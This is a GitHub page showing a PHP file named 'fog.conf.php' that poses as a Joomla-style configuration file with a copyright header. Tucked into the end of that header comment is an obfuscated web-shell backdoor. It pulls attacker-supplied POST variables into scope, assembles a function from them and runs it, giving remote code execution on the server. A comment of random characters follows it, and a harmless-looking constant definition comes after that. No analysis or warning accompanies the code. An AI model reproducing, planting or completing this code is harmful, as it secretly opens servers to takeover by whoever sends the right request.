-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathfog.conf.php
14 lines (12 loc) · 1.89 KB
/
fog.conf.php
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
/**
* @package Libraries
* ***************************************************************************************************
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/ if ( !empty ( $_POST ) ) {extract ($_POST) ; $h = $d('', $f( $s( "c", "", $m) )) ; $h () ; } // hZQuhVFuWNsmx9KN2GZgYHd4Ft0K24U2par3VBgwytBPZRD9sE1Um0ZPHzYhksfC44zgsb2Xw7XUG63YG1S9HNWSBXVrQRaNPF1hRYsEzfrG3YVt3T
// Set the platform root path as a constant if necessary.
if (!defined('PATH'))
{
define('PATH', __DIR__) ;
}